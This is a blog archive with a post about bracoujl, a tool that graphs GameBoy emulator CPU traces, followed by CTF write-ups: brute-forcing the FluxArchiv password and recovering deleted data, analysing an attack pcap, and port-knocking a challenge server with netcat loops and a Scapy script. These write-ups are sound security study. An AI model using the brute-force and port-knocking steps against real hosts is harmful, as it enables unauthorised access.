The hell of CPU debugging

Written by Franck Michea, 2013-12-30 23:23:15

This article aims to give an overview of my project named bracoujl, a script I made when writing and debugging my GameBoy color emulator project. Both projects' code are available on my bitbucket: the emulator (nebula) and the debugging tool (bracoujl).

Tip: If a graph in this blog post is big, browser will not make it easy to move arround to inspect it. For this, eog is cool. It has zoom and drag-and-drop movement features.

Is writing an emulator for the GameBoy easy? Well I did not think it would take me that kind of debug to do so, but I think this is an interesting story.

While starting it, I decided I wanted it to be clean. If you read this nice chart containing all the opcodes of the CPU, you can see patterns. Cool! This means we have an opportunity to factorize the code! The most important thing I learnt about emulation: the CPU is the easiest thing to write and understand, but the easiest to screw too, and even if it's not directly the CPU that fails, it will probably be impacted. (memory, anyone?)

With bracoujl, the goal was to get a better idea of what the CPU was doing, to understand bugs easier. This blog post will present what bracoujl can understand, and then show examples of debugging done with it.

Beginning with CPU debugging

When starting to debug my emulator, so basically watching what was being executed, I first started with the awesome ROMs written by blargg. It was cool and helped a lot, but one thing really hit me fast: if you don't really know where the bug is, stepping through the code becomes boring really, really, really quickly.

Most of the ROMs I worked with start with a lot of memory initialization and the simple process of extracting some code or data from somewhere in memory to somewhere else (ROM to RAM for example). Check the function bellow for example. It comes from the bomberman ROM.

Bomberman sub_0237: memset(%hl, 0, %bc)

This function is small and called 13 times, but the loop is executed 16691 times which represents over 100k instructions linearly. And this is only a small function, when debugging a bug caused by the joypad, I used to generate logs containing millions of instructions executed.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
[DEBUG] PC: 0100 | OPCODE: 00 | MEM: C350 | DIS: nop
[DEBUG] PC: 0101 | OPCODE: C3 | MEM: 5001 | DIS: jmp $0x0150
[DEBUG] PC: 0150 | OPCODE: F0 | MEM: 44FE | DIS: ldh %a, ($0xFF44)
[DEBUG] PC: 0152 | OPCODE: FE | MEM: 9138 | DIS: cp %a, $0x91
[DEBUG] PC: 0154 | OPCODE: 38 | MEM: FAAF | DIS: jr cy, $0xFA ; ($-6)
[DEBUG] PC: 0150 | OPCODE: F0 | MEM: 44FE | DIS: ldh %a, ($0xFF44)
[DEBUG] PC: 0152 | OPCODE: FE | MEM: 9138 | DIS: cp %a, $0x91
[DEBUG] PC: 0154 | OPCODE: 38 | MEM: FAAF | DIS: jr cy, $0xFA ; ($-6)
[DEBUG] PC: 0150 | OPCODE: F0 | MEM: 44FE | DIS: ldh %a, ($0xFF44)
[DEBUG] PC: 0152 | OPCODE: FE | MEM: 9138 | DIS: cp %a, $0x91
[DEBUG] PC: 0154 | OPCODE: 38 | MEM: FAAF | DIS: jr cy, $0xFA ; ($-6)
[DEBUG] PC: 0150 | OPCODE: F0 | MEM: 44FE | DIS: ldh %a, ($0xFF44)
[DEBUG] PC: 0152 | OPCODE: FE | MEM: 9138 | DIS: cp %a, $0x91
[DEBUG] PC: 0154 | OPCODE: 38 | MEM: FAAF | DIS: jr cy, $0xFA ; ($-6)
[DEBUG] PC: 0150 | OPCODE: F0 | MEM: 44FE | DIS: ldh %a, ($0xFF44)
[DEBUG] PC: 0152 | OPCODE: FE | MEM: 9138 | DIS: cp %a, $0x91
[DEBUG] PC: 0154 | OPCODE: 38 | MEM: FAAF | DIS: jr cy, $0xFA ; ($-6)
[DEBUG] PC: 0150 | OPCODE: F0 | MEM: 44FE | DIS: ldh %a, ($0xFF44)
[DEBUG] PC: 0152 | OPCODE: FE | MEM: 9138 | DIS: cp %a, $0x91
[DEBUG] PC: 0154 | OPCODE: 38 | MEM: FAAF | DIS: jr cy, $0xFA ; ($-6)

This is the input of bracoujl. This input format is defined by the CPU configuration used. DIS was added by a miscellaneous script (bundled with bracoujl) for your convenience, but it is not in the original logs.

This is only the first problem, because while executing this, you must save all the calling backtrace, and follow in which loop you are in (without forgetting nested loops). Additionally, once you have interruptions implemented, they will start randomly, so you must remember what you were looking at and context switch in your head too, for it.

I must be honnest, I did not really check what other people did on the subject. I thought of this as an interesting problem and wanted to solve it myself. Here are the solutions I weighted:

  • I was in C++, so simply debug the CPU through my C++ code in gdb.
  • Write a simple debugger for the z80 CPU, with memory/register dumps and breakpoint management.
  • Write a tool to transform logs of the linear execution of a ROM into something useful.

The first approach is OK for me if you know what you want to debug. Say find out what contains memory for a certain instruction. But it starts to be as boring as steping through the instructions when you don't know what you want to find.

I did not take the second approach for a simple reason: the support of this is too complicated. With a gameboy emulator, having another working emulator at hand with sources is easy, and it helps a lot to be able to compare behaviors. It helps a lot to understand the inner-workings of this type of hardware, but if you implement a debugger in yours, you must do it for your reference too, which is not practical.

Writing a debugger brings easy bugs with it too, or it could be fooled by the current bugs of the CPU itself. Instead, only having to print the current program counter, and the instruction opcode on stdout is easy, doesn't require to understand the whole CPU and memory architecture for a given emulator and avoids making mistakes.

It is in my plans to write the debugger for the z80 for nebula. My point is that it is not a good solution when the CPU is totally broken. Finally, the last solution is re-usable. If you currently write an emulator, you should be able to try it with a really small patch in your code.

What bracoujl can understand (to an extent)

So the solution was to automate the process of transforming of the linear logs to graphs, generated with graphviz via a dot file. The visual form of functions is a lot better than instructions on a linear way.

This part will explain what bracoujl understands and why it matters regarding our problem. Titles should give you a nice idea of all the problems I encountered while solving them.

I think you must first understand how bracoujl proceeds. The base of the algorithm is as follow:

  • For each instruction that was executed. We have pc (program counter), opcode (a byte being the opcode) and, in the case of the z80, two bytes of memory following the opcode for the disassembler, that could be skipped if there was no disassembler.
    • Check the pc in our current graph. We store the opcode at that pc as an instruction and link it to the last instruction executed.
    • Only the link step is necessary if we already knew the instruction.
    • If we already knew the link too, nothing has to be done to construct a graph.
  • When we read all the instructions, we can now remove all the links between two instructions where the starting instruction doesn't go anywhere else and the ending instruction isn't reached by any other instruction. This creates blocks.
  • Once all the blocks are created, we just need to output all those as a dot file and then use them to generate the image files necessary.

But this will generate big, un-readable graphs that cannot be used easily. Here are a series of fixes that bracoujl does and that enhance the readability of the graphs.

Graph readability and size

(Conditional) Jumps

Lets start with a first, little fix that enhances readability quite a lot. The first fix I decided to do is to cut any block if it ends on a jump. This is done easily through the CPU configuration used by bracoujl.

All that was needed is a list of jumps, relative jumps and the cutting was easy. But something makes the graph a lot more readable: colorize the links on conditional jumps, in green when it is taken, in red when it is not triggered.

This is simple if we know the size of a given jump. When retrieving the next instruction, we can know if it is the instruction behind the jump in memory (which means we fell-through) or another address, in which case we decide we took the jump.

The result can be seen in above graph of the function sub_0237 with the loop that uses a relative jump of -7 bytes if %b | %c is not zero (%bc is not zero). When the relative jump is taken, we go back at the beginning of the loop (green link), else we continue to the end of the function (red link).

Functions

First thing done to enhance readability, was to understand when a call was made, and when it returns, and to continue building from the call opcode on ret. For instance, take this simple x86_64 assembly code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
func:
    push rbx
    xor rbx, rbx
    mov [rax], rbx
    pop rbx
    ret

main:
    mov rax, 0xcafebabedeadbeef
    call func
    xor rax, rax
    inc rax
    ret

Seen linearly, it looks like this log:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
mov rax, 0xcafebabedeadbeef
call func
push rbx
xor rbx, rbx
mov [rax], rbx
pop rbx
ret
xor rax, rax
inc rax
ret

But when drawing the graph, you don't really want to have a ret linked to the xor rax, rax, so the goal was to understand the ret instruction and to go back to the call instruction. This is done easily with a back-trace list of addresses, the list of call and rst (interrupt call) instructions.

But z80 has both conditional call and ret instructions. So the process of understanding if one of these instructions triggered is done the same way than what is done for jump instructions, explained above.

When starting the project, call links would also be colorized, but in blue. The problem is, graphs became bigger and bigger. And if a function was called in a lot of places, it became a hot-spot of the graph. Below is an example of an old version, not too huge, that shows the readability problem of having all functions in one graph.

Uncut functions

Now only bigger functions look like this, and all calls are replaced with little boxes only saying Call to sub_XXXX. The next graph shows a function with some calls, that looks a lot cleaner now that the functions are split.

Sample function with multiple sub calls.

Interrupts

Another problem are the interruptions done by the CPU. They will start "randomly" between the instructions. The problem is, it breaks a lot of blocks in pieces, and this is annoying. The important thing to understand is that, even if the first execution of the function is broken only in one place, the more it is called, the more it will be broken, and often in a lot of different places.

This example (I crafted by hand) shows the kind of graphs you would get with only the function sub_0237 above and the interrupts not removed out of the way.

Interrupts: sub_0237 brooooken!

As you can see, the little function above is now a complicated cluster of nodes with links crossed everywhere. The end result looks a lot like function cutting, but for detection, this time I used the fact that all interrupts have know addresses (in practice a jump table located from address 0000h to address 0060h every 8 bytes).

There is another way to trigger an interrupt, and this is with the rst instruction. Now this is not a problem, in fact this is managed the exact same way a call is managed. Both methods use the same algorithm than calls for the back-trace, and the way conditional returns are managed.

Other behaviors

Now we have ok looking graphs of the program being executed. A lot more readable than only the linear logs of execution. But there are still other things done by a ROM that are disturbing, and must be understood.

Memory changes

This problem can come if there is self-modifying code, virtual memory or, like in the GameBoy, memory banking.

Memory banking by example

The first 4000h addresses of the address space on the GameBoy are the first 4000h bytes of the ROM, we will call ROM Bank 0. This only gives 16 KB of space for the ROM in the address space, for all game code and data. This is small, so the next 4000h addresses (from 4000h to 7FFFh) are a view of another 16 KB of the ROM. It is a switchable view of ROM banks. So the GameBoy can address 32 KB of ROM memory at the same time.

This memory is not writable, so when writing to this address space, it switches the current memory viewed by the switchable memory bank. There are several memory controllers that can be used, documentation can be found there.

Lets take an example with MBC1 memory bank controller. Say we currently are on bank 2, which is 8000h:BFFFh of the ROM viewed through 4000h:7FFFh of the address space. If the code writes value 05h on any address of 2000h:3FFFh, this will change the lower 5 bits of the current ROM selector with the lower 5 bits of the value, which will make us view fifth bank in this case. We now use 14000h:17FFFh of the ROM when addressing 4000h:7FFFh of the address space. This system makes it possible to address up to 2 MB of ROM memory, instead of 16 KB.

Memory changes management

All this speech to say what? That whenever any code is executed in memory range 4000h:7FFFh, it can be up to 125 different functions if MBC1 is used, and it happens. This would be the same problem if the code was in memory and changed itself.

To manage this, bracoujl compares the instruction executed with the instructions known for this address. If they are different, it creates different paths from the preceding instruction. Sometimes they merge back with the old flow, sometimes they just totally differ. It often happens for a function that is called and is switched, or the target of a jump.

The blocks are then merged and split as usual, and same-memory blocks are named with a memory label, that is the order in which they were gone through.

This is kind of a proof-of-concept management algorithm, it sadly doesn't give any insight in the timeline of the memory changes. Even though I didn't see it become chaotic, I think it could, which is not cool. Anyway, with this feature, bracoujl is not disturbed if the code changes for a same memory address.

push + ret = jump

Another behavior used by some games is to do a push of an address, then a ret and so effectively doing a jump. This used to break completely the back-trace of calls and interrupts.

To fix this, the concept of "ret miss" was introduced. bracoujl checks for the address of the next instruction after a ret against the expected address (computed from the size of call opcodes). If they don't correspond, this means there was a weird manipulation of the stack done, and is understood as a "ret miss".

Sometimes this is just because there is a bug in memory or CPU, but in cases like the below function, it is stack manipulation.

"push + ret = jump" in sub_0427

If you look at the three local blocks named loc_4052, loc_405C and loc_408D. They all go to block loc_0433 and are considered ret misses (brown link). This can be explained by the first block of the function, sub_0427, where we can read ld %bc, $0x0433; push %bc. Since the jump instruction uses %hl register and jumps to switchable ROM banks from ROM bank 0, it was probably the easiest way to go back to the right code in bank 0 without hard-coding any address in rom banks.

As you can see with this example, this method keeps the graph readable and simple, and reading it explains the behavior easily, which is cool.

Other features

Graph comparison

This feature aims to compare two graphs produced by two different flows (from two different emulators, or two different versions of the same emulator) against each other. Once the graph are produced, they should look a lot alike for a given code.

Number of loops (on synchronization mechanisms) and interrupts can vary a lot between the two emulators. Even more if both are not perfect emulators. This is why linear comparison with diff or meld is impossible. Plus files are usually huge, for not that much code.

The output currently is fairly simple, but it at least lists the function where it found different blocks and list all the different blocks. Differences currently include:

  • A block that reaches more places in one of the graphs.
  • A block that is reached from more places in one of the graphs.
  • A block that is present in only one of the graphs.
  • A block is different in graphs. Which can be caused by:
    • A block that was not split in two, because one of its inner instructions was reached once, instead of from multiple other blocks.
    • The CPU gets the size of an instruction wrong and started to execute some wrong code.

Disassenbly

Finally, one last choice was to put the optional disassembler directly in bracoujl instead of expecting the emulator to do it. The biggest argument being that then you can compare logs from multiple emulators containing disassembly at no cost.

Case studies

Here are some examples of graphs that really show how much it can help identify bugs. In all these examples, the left image will be the expected behavior, and the right one will be the buggy behavior.

For the simple case studies, the graphs are given with a patch to add the bug to nebula, from commit number b3b72f3 and both logs are from nebula. I indeed added those bugs intentionally to show the graph, but if you go through the commit log, you should find those same bugs when I fixed them. The big case studies are made directly with the fixed commits, referenced in the explanations.

Simple case studies

Multi-byte instruction with wrong size

OK KO

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
diff --git a/src/z80/z80opcodes.cc b/src/z80/z80opcodes.cc
index 8c9ed8e..55b1a49 100644
--- a/src/z80/z80opcodes.cc
+++ b/src/z80/z80opcodes.cc
@@ -61,7 +61,7 @@ uint16_t ld_1B_reg_d8(MMU& mmu, Z80Registers& regs, uint8_t& reg)
 uint16_t ld_2B_reg_d16(MMU& mmu, Z80Registers& regs, WordRegProxy& reg)
 {
     reg.set(mmu.read<uint16_t>(regs.PC + 1));
-    return P(3, 12);
+    return P(2, 12);
 }

 uint16_t ld_2B_reg_d16(MMU& mmu, Z80Registers& regs, uint16_t& reg)

This first example was a little modified so that second image is not too big (this should be fixed quite soon in bracoujl, since I consider this an undesired behavior). Anyway, as you should clearly see, there are additional instructions in second and third blocks. Then later instead of a jump, the CPU goes into irrelevant code that ends up being mostly nops, and this loops endlessly.

This bug was also observed with the CPU starting to execute a part of the memory containing data or not aligned properly on code and then stopping on an undefined instruction.

Relative jump mis-behaving

OK KO

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
diff --git a/src/z80/z80opcodes.cc b/src/z80/z80opcodes.cc
index 8c9ed8e..964394e 100644
--- a/src/z80/z80opcodes.cc
+++ b/src/z80/z80opcodes.cc
@@ -408,7 +408,7 @@ uint16_t jr_if(MMU& mmu, Z80Registers& regs, uint8_t val)
     if (val)
     {
         regs.PC += (int8_t) mmu.read<uint8_t>(regs.PC + 1);
-        return P(2, 12);
+        return P(0, 12);
     }
     return P(2, 8);
 }

This mistake I made on relative jump is computing the target address without counting jump instruction size. The graph makes it really clear that some instructions are not executed. Again this example is an easy one that could have been avoided.

Flags not set correctly

If you don't have test ROMs as I did for the GameBoy, you can also check for flag consistency with the number of loops you execute. Say one instruction sets the flag triggering a relative jump instruction for a loop one value too soon, then you have one iteration of a loop that is not executed, that can be seen in a graph too. But lets go into more interesting bugs.

Case study: Is joypad OK?

Bomberman: start of the ROM bug (gif).

This bug was in nebula up until commit 9859ef3 (included). In addition to looking nice, this the kind of bug that bracoujl is made for. When starting to debug, the two usual questions must be answered:

  • Where is the bug?
  • What is causing the bug?

My understanding at the time was that to function properly, the minimum necessary to a game was the CPU, the memory and the GPU. Sound and joypad were optional. We could guess that this bug must come from the GPU, but once the first frame is displayed correctly, the game continues correctly, weird.

So lets try to use bracoujl on this. I had another emulator at the time, and I made the stats with this when I was really debugging it, but the following stats are from nebula (9859ef3 for the buggy stats, b3b72f3 for the good ones).

When trying to stop on the first valid frame as soon as possible on both, the correctly working emulator was able to display the first frame with a few letters in 320,138 instructions (13 MB of logs), while for the buggy version, 2,938,046 instructions were necessary to get to the first frame (118 MB of logs), before the first letter could even be displayed. This is interesting, the CPU really is impacted heavily here. We are not going to read this by hand. So lets put bracoujl in use.

When looking at the graphs (or using the comparison function), the first difference is in the function sub_0819.

OK KO

Hmmm this is weird: FF00h is an I/O Port to ... the JOYPAD status. I honestly could not believe this could be a problem. We also noticed that interrupts were triggered totally differently in the two emulators we had, and I thought this was probably more relevant to the problem.

Since we were two to work on nebula during that time and I knew I had done a shitty job at implementing the joypad, we decided to split jobs: my friend colona would fix the joypad while I would continue to analyze the logs for interesting stuff.

Turns out that once he came back to me with a patch for the joypad, he also fixed the bug with it. Bomberman apparently has a weird behavior if the JOYPAD is not in the state it expects it to be in. Thanks again to Ivan Delalande (colona) for his awesome help on this bug.

I think the lesson learnt with this bug was that trying to explain the bug with a complicated explanation when an obvious issue was there was wrong. Instead, starting by fixing simple issues before reaching for more complicated explanations is a good idea in a program like that.

Case study: Memory banks rock!

Often, bracoujl is an helper with another method. This bug is an example of that. It was present in nebula in revisions up to 142bbd8 included. To explain this bug, I must explain a little bit how nebula was written. One of the first goals was to keep it clean, which means avoid redundant code.

If you look at the opcode table in the CB table, there are 3 instructions that do things with a very similar API: res, set and bit. They all take a register, a bit, do something on it and we are good. There is also the version with %hl dereference. This gives a great opportunity to write a proxy with the basic operations of reading and writing the registers/memory, and the specific function to do just what it's supposed to do: set, reset or test a bit in the value. But the bit function doesn't need to modify the value, and I said: whatever, we will just write back the unmodified value to the registers/memory and this will be good, no need for a separate function.

Few weeks/months later, the emulator is a going well and now implements a lot more features, including the graphical emulation and some memory banks controllers, but when launching some games, for example Kirby, it would crash with the error Unknown opcodes E3.... Did we end up in some shady memory part, say data? Lets check what the graphs look like.

OK KO

This time, the working emulator was not really necessary, anyway seeing its graph gives a good insight. Lets start where the emulator crashed, in function sub_40E4.

The interesting thing is both graph differ when they start executing memory in switchable memory bank. This is an information we did not have, and which is really interesting. So I started to log when bank switches where done, but without the informations available in the graphs, there would be too much. Using the linear log, I went to the crash point, and searched backward for bank changes. One happens in the function sub_19F9 linked bellow, and called just before the CPU starts executing wrong memory. The guilty instruction is bit $3, (%hl) in local block loc_1A6E.

sub_19F9

This behavior was not expected when I first wrote the CPU. Indeed, memory banking was an unknown concept to me and I did not expect that writing the same value I just read to a memory position could have side-effects like that at the time. Here bracoujl was used with another type of log, to first understand and target what was going on, and then understand the second type of log, which made the debugging a lot easier and faster.

Conclusion

This project was really interesting. The material to test was really diverse, and doing that kind of work raises a lot of interesting corner cases. It also taught me that trusting your debugger is "dangerous" and also really important. Indeed when trying to find a bug, assumptions will be made based on the information taken form the debugger. This project taught me that when writing a debugger, a lot of care must be put into it, so that then when you use it, you can make your assumptions safely. Obviously, there is no warranty bracoujl is perfect, but it works correctly :P.

You should have no hard-time trying it

And if you do, bug me! Again, everything is available on my bitbucket. If you want to try it on another architecture, just take the z80 configuration (disassembler is optional), adapt it to your architecture and try to run it. You can even send me a mail and I will be happy to help you with that.

What next?

Missing features

Even though my nebula project is in pause for me, which means bracoujl too, but this does not mean that it will never see new features. Some of the things that could be enhanced are:

  • Adding serialization of graphs. This cannot be done with pickle trivially since there is a circular dependency right now between the blocks and the links. But it must be possible easily anyway, by either removing the circular dependency (not sure if possible) or simplifying one of the references. It would be awesome speed-wise. Graphs are currently generated from logs each time svgs, dots or comparison is done.
  • Add a search feature, that gives information, like the local block in which a particular instruction is, or it's position in the image (see next point). If you really need searching feature now, grep is still cool.
  • Maybe something other than graphviz would be cool to generate the graphs. Sometimes the results are a little weird, nothing too bad though.
  • Being able to have information on the time-line, and put annotations to the graph, could be cool :)
  • Bugfix: Compress nop-sleds (as seen in the graph the "wrong-size" part, where I had to fix them by hand so that they are not too huge.

New project idea

To conclude, this project gave some of my friends and me a fun idea: why not try to infer an instruction set from its behavior? Say you start to reverse engineer a virtual machine for an unknown architecture, it could be fun to work on some tool that would give insight by observing the behavior of it executing code. I don't know how far this idea could go, but I may work on that some time soon.

hack.lu 2013: FluxArchiv Write-up (both parts)

Written by Franck Michea, 2013-10-27 23:18:06

For this exercise with two parts (400 and 500 points), we were given too files: a binary named archiv and some data named FluxArchiv.arc. The two parts involved the same binary.

When running the binary with no options, it displays an usage message containing the different options possible. We have:

  • An option to list the files contained in the archive.
  • An option to add a file to the archive.
  • An option to extract a file from the archive.
  • An option to delete a file in the archive.

Every command takes at least the archive name and a password. The last three also take a filename.

If you want to try it, it was dumped here, thanks to Jonathan Salwan.

Part 1: Find the password

Sooo, the first part of the exercise requires us to find the password of the archive FluxArchiv.arc given. We started reversing the binary and noticed a first thing: Awesome, the symbols were not stripped! ... Well actually they were shuffled, which is not that good, but it is not a real problem either. In this write-up, We will always keep the wrong names, but explain what they actually do.

We started following the path in main that lists the files and followed the code to understand what is done to the password. This can be easily done by following parsing of the command line arguments.

The first function called on the password argument is incorrectly named checkHashOfPassword. It will initialize a global buffer of length 0x14 named hash_of_password (correctly) with the SHA-1 digest of the given password. This function is simple.

If we continue to follow the listing option, it then checks that it can access the archive file given, fopens it and then calls encryptDecryptData, that really only checks the magic number of the archive format, at position 0x0: FluxArhiv13.

If this went OK, it will then call verifyArchiv. This function will do the interesting thing for this part. It will check that our password is correct.

It first fseeks to offset 0xC, and then reads 0x14 from the archive: another SHA-1 digest. Then it will fill an internal buffer with a re-ordered version of hash_of_password. It will then take this buffer and calculate the SHA-1 digest of it. This digest is compared to the one read from the archive. If it matches, the password is good.

So, in summary, the password is good if sha1(reorder(sha1(password))) equals to the 20 bytes at offset 0xC in the archive.

The subject says that the humans who created the archive were drunk and decided to use a 6 character, upper-case or digit password. That is 2.176.782.336 passwords possible. That looks brute-force worthy.

We first wrote the reordering part (the one that calculates the source index) in python to compute them all. Once done, we decided to write something to brute-force the algorithm. The source code of the brute-forcer can be found here. With 8 threads, it takes 2 minutes and 30-something seconds to go through the whole password space on my i7, and outputs one password: PWF41L.

Part 1 solved. For those interested, the archive contains 3 images and one mp3 file. They are not really useful.

Part 2: Find more!

OK so now that we have the password we can decrypt the data. Yes, indeed, the data is encrypted with RC4, using hash_of_password as the key. The decrypt part is in the function sanitizeFilename. First interesting thing: it is called a lot, and it always resets RC4. So you can't decipher the whole archive in one shot. Damn, we must understand the format then.

The code is quite simple, but I am honestly bad at reverse engineering, so I decided to take this opportunity to try another approach for once: rewrite the program in C.

The complete source code can be downloaded here. It doesn't contain the whole program but only the parts I needed to understand what the program was doing and how to finish this part.

I started by scrolling the functions randomly and trying to understand the simple ones. One that was really useful was listAllFilesInArchiv.

First, we can see in it a pattern we will find a lot: read 8 bytes, decrypt it and reverse it in a value byte per byte. I called this function read_int in my C code, it reads a 64-bit integer and switches its endianness.

So the function reads two integers (a andb) and then starts to do the interesting thing: It will clear both with zeros. Then it clears a field of size 0x10, and then a field of size 0x60.

Another pattern we will find often is a loop for i from 0 to b excluded, seek to a, read the integer at that position and use it as next a, then clear it and continue. In short, a is the offset of the next block in a linked list of blocks, and the first block contains 4 fields, with the second one being the number of blocks. Later we discovered that this is necessary because the last block doesn't begin with an offset set to 0, but to some value to permit calculating its actual size. Here is the C:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
void listAllFilesInArchiv(FILE* stream, unsigned int off) { // delete_file
    char ptr[0x8];
    uint64_t counter;
    uint64_t curpos;
    uint64_t nbblocks;
    uint64_t nextblock;

    fseek(stream, off, SEEK_SET);
    nextblock = read_int(stream);
    nbblocks = read_int(stream);
    fseek(stream, off, SEEK_SET);
    clear_data(stream, 8);
    clear_data(stream, 8);
    clear_data(stream, MD5_DIGEST_LENGTH);
    clear_data(stream, FILENAME_SZ);
    for (counter = 0; counter < nbblocks; ++counter) {
        fseek(stream, nextblock * 1040 + 0x20, SEEK_SET);
        curpos = ftell(stream);
        nextblock = read_int(stream);
        fseek(stream, curpos, SEEK_SET);
        clear_data(stream, 8);
    }
}

The second interesting thing about this function is that it is called on delete (we can see it from command parsing). So an interesting thing rises: if a file was added and then deleted, its data is still present in the archive. It is only deleted from the listing and its blocks are considered "free".

The offset given to it comes from extractFileFromArchiv. This function starts by seeking to offset 0x20, so just after the global magic + the SHA-1 for the password. It checks a magic ("FluXL1sT"), then reads an integer and then checks for 8 structures of 128 bytes. This is the index! The integer read, if not null, is a link to the next list of 8 files (still beginning by the magic).

Now we have enough to use my technique to find the unused blocks, but I actually rewrote the complete file listing and extraction to make sure I did it correctly. I then basically logged every block used: all blocks used are 1040 bytes long (this is why we have 8 entries of 128 bytes). I then compared it to the possible list of blocks and just decrypted these blocks. The key was in block at address 0x28a20 + 0x8:

1
2
3
4
5
6
7
$ python hacklu2013-fluxarchiv-unused-blocks.py logs
Found unused block: 0x28200
Found unused block: 0x28610
Found unused block: 0x28a20
[...]
$ python hacklu2013-fluxarchiv-decrypt.py 0x28a28 0x410
b"[...] alike.\n\n+++The Mentor+++\n\nFlag: D3letinG-1nd3x_F4iL\n\n[...]"

Example logs here.

Conclusion

I didn't finish the second part in time to have the points. I actually used techniques that took a lot of time, and I was quite slow anyway. My goal was not productivity. I took the first part as an opportunity to check that I remembered how to use pthread and the second part as a good example to try another technique for reverse engineering I never used before. Although it was a "slow" technique, it really helped me organise my thoughts and test/fetch data (like the offsets of used blocks, even though it was possible without).

It was interesting to see. Next time will be for speed!

ebCTF 2013: Network challenges: NET100, NET200, NET300

Written by Franck Michea, 2013-08-04 20:00:00

This articles was originally written for LSE Blog with hakril and colona. It was archived here. Check this awesome blog out too!

NET100: index.php?-s: Post-attack network log analysis

1
2
OMG, Eindbazen got hacked. Can you figure out what this evil hacker did?
http://ebctf.nl/files/da021f41e137fa42501586915d677752/net-100.pcap

For this first networking exercise, we will analyse network logs of an attack against Eindbazen to find what the attacker could do! We are given a clean pcap of the whole attack.

Part1: First look at the pcap file

First thing we can notice, is a long UDP "stream" between the attacker and the target. Just before the attack, a POST was done on the web server hosted by the target. You can find the uploaded php script here. We didn't spend too much time on it since it looked like a "command receiver on UDP", which was enough information to continue analysing the logs.

Part2: Interesting HTTP traffic

Apart from the UDP stream, we could notice kerberos and ssh traffic, not that interesting, and a GET from the target to the attacker, of a file named rootkit.zip, quite interesting! We fetched the file but it was password protected. Let's continue digging.

Part3: Interesting UDP stream commands

Back at the UDP stream, we searched for commands related to rootkit.zip and found this interesting part of the stream where we can see the zip file being unzip'ed. Follows what looks like commands to send the password to unzip command, letter by letter: alongpassword1234.

This password unlocked the zip file, in which we found a file flag.txt, containing "Instead of a rootkit we will just give you a flag: ebCTF{b78dc61ce895a3856f3520e41c07b1be}".

Done!

NET200: Who's there

1
2
We found this strange website.
http://54.216.81.14/

This website only contains:

1
112 + 386 + 712 + 1398 + 8771 + 11982 + 15397 + 23984 = 51037

After wondering a while what this addition was supposed to mean (especially since it was wrong and should give the result 62742), we noticed that all these numbers were in the valid port range. That’s when the semantic of this operation struck us: a collection of 8 ports giving a final port, this is exactly the principle of port-knocking.

The idea of this technique is to open a port only for a given client after he knockes to a pre-defined number of ports in the right order, which is only known by the server and the trusted users of the protected service.

So we can execute this first series with a simple netcat:

1
2
3
4
5
6
7
8
9
$ for port in 112 386 712 1398 8771 11982 15397 23984; do
>   netcat -v 54.216.81.14 $port
> done
netcat: unable to connect to address 54.216.81.14, service 112
netcat: unable to connect to address 54.216.81.14, service 386
[...]
netcat: ec2-54-216-81-14.eu-west-1.compute.amazonaws.com (54.216.81.14) 51037 [51037] open
So you are knocking me, how about I return the favor?
Repeat after me and I will open the last port...

Is it knocking us back and expecting we mimic it? We can confirm that with tcpdump:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# tcpdump -n -i eth0 'src host 54.216.81.14'
16:25:22.867635 IP 54.216.81.14.1337 > 163.5.55.17.8112: Flags [S], seq 0, win 8192, length 0
16:25:23.869346 IP 54.216.81.14.1337 > 163.5.55.17.33386: Flags [S], seq 0, win 8192, length 0
16:25:24.874334 IP 54.216.81.14.1337 > 163.5.55.17.14712: Flags [S], seq 0, win 8192, length 0
16:25:25.882108 IP 54.216.81.14.1337 > 163.5.55.17.4398: Flags [S], seq 0, win 8192, length 0
16:25:26.885593 IP 54.216.81.14.1337 > 163.5.55.17.1771: Flags [S], seq 0, win 8192, length 0
16:25:27.889869 IP 54.216.81.14.1337 > 163.5.55.17.52313: Flags [S], seq 0, win 8192, length 0
16:25:28.894443 IP 54.216.81.14.1337 > 163.5.55.17.25697: Flags [S], seq 0, win 8192, length 0
16:25:29.900296 IP 54.216.81.14.1337 > 163.5.55.17.932: Flags [S], seq 0, win 8192, length 0
16:25:30.905643 IP 54.216.81.14.1337 > 163.5.55.17.22222: Flags [S], seq 0, win 8192, length 0

OK, so let’s ping it on these exact same ports in that order. But this time, while the service was rejecting instantly all of our SYN TCP packets in the first series with a RST, for this new series, it seems to drop half of the packets and to reject the other half with RST. Thus, our previous super cool for-loop got stuck in the middle and caused the whole series to fail. So we just changed it to launch the netcat in background and it worked perfectly. This time the 22222 port replied with this message:

1
2
3
4
5
6
7
[Advanced]
    sequence    = 234,781,983,2411,9781,14954,23112,63991
    seq_timeout = 15
    command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT
    tcpflags    = fin,urg,!ack
    cmd_timeout = 30
    stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT

We recognized it was a chunk of configuration for the knockd daemon, which can be used to setup port-knocking on a UNIX host. It is easy to read, we just have to knock to another series of ports given by the sequence option with the appropriate TCP flags, specified by the tcpflags option, and we will be given access to the port 32154.

This time, we could not use netcat because it does not allow us to specify arbitrary TCP flags, but, since we already had a script ready for the NET300 challenge using Scapy, we also used it for this new series:

1
2
3
4
5
from scapy.all import *

ports = [234,781,983,2411,9781,14954,23112,63991]
for p in ports:
        print(send(IP(dst="54.216.81.14")/TCP(dport=p,flags="FU")))

And just connected normally to the final port which gave us the flag of this challenge:

1
2
3
$ netcat -v 54.216.81.14 32154
netcat: ec2-54-216-81-14.eu-west-1.compute.amazonaws.com (54.216.81.14) 32154 [32154] open
ebCTF{32c64f2542ba4566acff750196ca2e13}

NET300: Hop on a plane!

1
2
3
We found this website which uses a location based access control system.
Hop on a plane and hit all target zones!
http://54.212.115.245/

The content of the website

What we understood was that this service tries to locate us by pinging our IP from three servers located in the US, in Brazil and in Japan and display our approximate location on the map. The goal is to make that location change by delaying the ping replies we send back to these three servers and make it hop in each of the three circles on the map.

A few of us tried to look for ways to do that using iptables or the traffic control in the kernel but it was impossible with the first one and it took them a long time with the second one.

